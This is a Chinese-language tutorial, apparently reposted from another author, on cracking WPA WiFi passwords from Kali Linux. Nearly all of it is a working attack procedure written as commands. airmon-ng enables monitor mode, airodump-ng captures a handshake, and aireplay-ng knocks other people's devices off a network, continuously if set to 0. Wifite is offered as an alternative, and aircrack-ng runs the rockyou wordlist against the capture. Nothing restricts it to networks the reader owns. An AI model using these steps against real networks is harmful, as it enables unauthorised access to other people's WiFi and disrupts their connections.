设备:Kali系统+一块外接无线网卡
网上搜Kali 网卡 选择购买即可.
1.配置网卡
1.默认的VMware USB是没有开启的,需要手动开启.
window键+r->输入services.msc->找到VMware USB Arbitration Service 开启
虚拟机->可移动设备->找到自己无线网卡设备->连接即可.
当时弄了一会不知道自己网卡是否安装成功-_-
可以在右下角查看虚拟机是否识别到无线网卡设备.
)
或者打开终端输入
airmon-ng
出现wlan0即可
2.Wifi扫描和抓包
1.开启网卡的监听模式,监听模式开启后wlan0名字会变成wlan0mon
airmon-ng start wlan0
2.开始扫描
airodump-ng wlan0mon
退出扫描
ctrl+c
问题: 第一次扫描时有扫描信息,因不知原因重新扫描后没有扫描信息(不知道啥原理)
解决: 将无线网卡断开后重新连接.
3.开始抓包
airodump-ng --bssid BSSID -c CH -w 抓包存储的路径 wlan0mon
这里说下BSSID和CH是你之前扫描时得到的Wifi的mac地址和信道频率
抓包成功标志:
看到WPA handshake:mac地址
4.把别人连接到Wifi的设备T下线(没抓到包时)
aireplay-ng -0 数字 -c STATION -a BSSID wlan0mon
数字指的是攻击次数,设置为0时一直攻击
STATION是连接wifi设备的mac地址
BSSID是Wifi的mac地址
抓完包记得把攻击停止
第二种扫描方式wifite
命令wifite,选中一个target即可
3.用字典文件开始破解密码
解压自带字典文件:
gzip -d /usr/share/wordlists/rockyou.txt.gz
破解
aircrack-ng -w 字典文件 抓包获得的文件
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/home-03.cap
字典文件就是一字典
抓包的文件是.cap后缀名
这里补充下对linux目录结构介绍,如果破解命令出错一般是你当前目录没有切换到/
/--||root(~)|home
home就是你当前账户,root就是root用户,一般显示为~.
版权归原作者 叫我阿笑就好了 所有, 如有侵权,请联系我们删除。